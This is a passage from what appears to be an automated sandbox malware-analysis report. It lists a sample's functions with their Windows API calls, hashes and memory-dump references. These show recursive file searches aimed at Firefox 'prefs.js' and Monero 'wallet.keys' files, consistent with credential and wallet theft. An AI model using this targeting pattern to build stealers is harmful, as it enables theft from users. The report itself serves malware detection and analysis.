                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: 697954b27fd5a2ba2719c02dd0d02e5e283a44c8a075657dd2e9dc5c88aba17a
                                        • Instruction ID: 9a8e23f2e24001d42a7f08c676681a5afc5c7a5bfecf4c0c7c437f01d74b157b
                                        • Opcode Fuzzy Hash: 697954b27fd5a2ba2719c02dd0d02e5e283a44c8a075657dd2e9dc5c88aba17a
                                        • Instruction Fuzzy Hash: 936127B1900118ABCB24EFE0DC99FEE737CAB48701F50458DB60996151EB75EB85CFA1
                                        Function 007C47C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007C47D0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C47D7
                                        • wsprintfA.USER32 ref: 007C47F6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 007C480D
                                        • StrCmpCA.SHLWAPI(?,007D0FAC), ref: 007C483B
                                        • StrCmpCA.SHLWAPI(?,007D0FB0), ref: 007C4851
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007C48DB
                                        • FindClose.KERNEL32(000000FF), ref: 007C48F0
                                        • lstrcat.KERNEL32(?,0165F200), ref: 007C4915
                                        • lstrcat.KERNEL32(?,0165DAE0), ref: 007C4928
                                        • lstrlen.KERNEL32(?), ref: 007C4935
                                        • lstrlen.KERNEL32(?), ref: 007C4946
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 671575355-2848263008
                                        • Opcode ID: 1fd3bbf04cde2b4f8c77250017467121c03380b3d316fb9bc2b9b4fc9e1f7095
                                        • Instruction ID: 533a2012a45958ce848287dab36a165c2d6766423d4badb91fdb8c65ec791c7b
                                        • Opcode Fuzzy Hash: 1fd3bbf04cde2b4f8c77250017467121c03380b3d316fb9bc2b9b4fc9e1f7095
                                        • Instruction Fuzzy Hash: AB5156B1504218ABDB24EBB0DC99FED777CAB58700F40458CB64996190EB74DB85CFA1
                                        Function 007C40F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 007C4113
                                        • FindFirstFileA.KERNEL32(?,?), ref: 007C412A
                                        • StrCmpCA.SHLWAPI(?,007D0F94), ref: 007C4158
                                        • StrCmpCA.SHLWAPI(?,007D0F98), ref: 007C416E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007C42BC
                                        • FindClose.KERNEL32(000000FF), ref: 007C42D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 180737720-4073750446
                                        • Opcode ID: d39b7817fb10c1f2e1c8c1cfcf307e309b35083680ccadc4ac9bf69a5c374cf1
                                        • Instruction ID: 8ff0f8fb224d9c731c49c76690683e0509ecb8b8316ec0c06281fcd9a12745c0
                                        • Opcode Fuzzy Hash: d39b7817fb10c1f2e1c8c1cfcf307e309b35083680ccadc4ac9bf69a5c374cf1
                                        • Instruction Fuzzy Hash: CF5156F2504118ABCB24EBB0DC99FEE737CBB58300F40468DB64996050EB75DB858F91
                                        Function 007BEE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 007BEE3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 007BEE55
                                        • StrCmpCA.SHLWAPI(?,007D1630), ref: 007BEEAB
                                        • StrCmpCA.SHLWAPI(?,007D1634), ref: 007BEEC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007BF3AE
                                        • FindClose.KERNEL32(000000FF), ref: 007BF3C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: e19a1e375f1f75abe54426ea5071ddff43bde4a078f29503c1043511ccc8dde0
                                        • Instruction ID: 0ac9407cd3eae89f9e384acd921b2c3a34fa6d19d751f855cae0d6c4fcdcc78f
                                        • Opcode Fuzzy Hash: e19a1e375f1f75abe54426ea5071ddff43bde4a078f29503c1043511ccc8dde0
                                        • Instruction Fuzzy Hash: 52E13FB291111CEADB24EB60DC66FEE7339AF50305F4045DDB50A62092EE386F89CF65
                                        Function 007F0098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                        • API String ID: 0-1562099544
                                        • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction ID: b6c814376e84f7c7210b09a60432e84e7b232d08549b843ab87270d46b808767
                                        • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction Fuzzy Hash: 49E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                        Function 007BF7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007D16B0,007D0D97), ref: 007BF81E
                                        • StrCmpCA.SHLWAPI(?,007D16B4), ref: 007BF86F
                                        • StrCmpCA.SHLWAPI(?,007D16B8), ref: 007BF885
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007BFBB1
                                        • FindClose.KERNEL32(000000FF), ref: 007BFBC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: 149d4eb5e16e6654583926bfa1cc496376762c23b7dde2f51d719162ae204f8e
                                        • Instruction ID: 8aa76483623265a28aee98f443d820cb30ef92fe38caca3e5d74a91f2a6e5887
                                        • Opcode Fuzzy Hash: 149d4eb5e16e6654583926bfa1cc496376762c23b7dde2f51d719162ae204f8e
                                        • Instruction Fuzzy Hash: 53B14371A00108EBCB24EF60DD9AFEE7379AF54305F4085ADE50A56151EF38AF48CB92
                                        Function 007B1710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007D523C,?,?,?,007D52E4,?,?,00000000,?,00000000), ref: 007B1963
                                        • StrCmpCA.SHLWAPI(?,007D538C), ref: 007B19B3
                                        • StrCmpCA.SHLWAPI(?,007D5434), ref: 007B19C9
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007B1D80
                                        • DeleteFileA.KERNEL32(00000000), ref: 007B1E0A
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007B1E60
                                        • FindClose.KERNEL32(000000FF), ref: 007B1E72
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        • Opcode ID: c0650700fd7cb221abc3e103a5961b4a4cbca7b4354270049119b42d497c4322
                                        • Instruction ID: e4cb931c433ddc917fc33fccd37eaae45db52a0cec726feba495aa0fc3a76768
                                        • Opcode Fuzzy Hash: c0650700fd7cb221abc3e103a5961b4a4cbca7b4354270049119b42d497c4322
                                        • Instruction Fuzzy Hash: 8012BBB191011CEBCB25EB60DCAAFEE7379AF54305F4045DDA50A62191EF386F88CB61
                                        Function 007BDF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,007D0C32), ref: 007BDF5E
                                        • StrCmpCA.SHLWAPI(?,007D15C0), ref: 007BDFAE
                                        • StrCmpCA.SHLWAPI(?,007D15C4), ref: 007BDFC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007BE4E0
                                        • FindClose.KERNEL32(000000FF), ref: 007BE4F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2325840235-1173974218
                                        • Opcode ID: 8162901ad5f75b205a9184e4c3dec49b7f6b79ab41d1b2e6153ad94adc5a4608
                                        • Instruction ID: 14871dc7b2c9d97cf9861b79299079bd8361f05acb3bedf305632a16b1a650c2
                                        • Opcode Fuzzy Hash: 8162901ad5f75b205a9184e4c3dec49b7f6b79ab41d1b2e6153ad94adc5a4608
                                        • Instruction Fuzzy Hash: 11F1CBB191411CEACB25EB60DCA9FEE7339AF14305F4045DEA50A62091EF386F89CF65
                                        Function 007BDB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007D15A8,007D0BAF), ref: 007BDBEB
                                        • StrCmpCA.SHLWAPI(?,007D15AC), ref: 007BDC33
                                        • StrCmpCA.SHLWAPI(?,007D15B0), ref: 007BDC49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007BDECC
                                        • FindClose.KERNEL32(000000FF), ref: 007BDEDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
